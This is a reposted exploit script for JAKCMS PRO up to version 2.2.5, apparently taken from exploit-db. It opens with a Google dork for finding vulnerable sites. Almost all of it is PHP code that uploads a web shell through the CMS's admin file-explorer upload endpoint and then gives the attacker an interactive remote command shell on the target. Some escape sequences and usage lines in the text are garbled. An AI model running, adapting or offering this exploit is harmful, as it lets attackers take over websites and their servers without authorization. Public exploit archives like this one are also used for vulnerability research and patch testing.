JAKCMS PRO

Standard


# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 n";

print "nExample....: php $argv[0] localhost /";

print "nExample....: php $argv[0] localhost /jakcms/n";

die();

}

$host = $argv[1];

$path = $argv[2];

$packet = "GET {$path} HTTP/1.0rn";

$packet .= "Host: {$host}rn";

$packet .= "Connection: closernrn";

preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);

$sid = $m[1];

$payload = "--o0oOo0orn";

$payload .= "Content-Disposition: form-data; name="edit1"rnrn.phprn";

$payload .= "--o0oOo0orn";

$payload .= "Content-Disposition: form-data; name="input1"; filename="foo"rnrn";

$payload .= "< ?php ${error_reporting(0)}.${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))} ?>rn";

$payload .= "--o0oOo0o--rn";

$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));

$packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0rn";

$packet .= "Host: {$host}rn";

$packet .= "Cookie: PHPSESSID={$sid}rn";

$packet .= "Content-Length: ".strlen($payload)."rn";

$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0orn";

$packet .= "Connection: closernrn";

$packet .= $payload;

if (preg_match("/Error/", http_send($host, $packet))) die("n[-] Upload failed!n");

$packet = "GET {$path}cache/sh.php HTTP/1.0rn";

$packet .= "Host: {$host}rn";

$packet .= "Cmd: %srn";

$packet .= "Connection: closernrn";

while(1)

{

print "njakcms-shell# ";

if (($cmd = trim(fgets(STDIN))) == "exit") break;

preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("n[-] Exploit failed!n");

}

?>

Fonte: http://www.exploit-db.com/exploits/17882/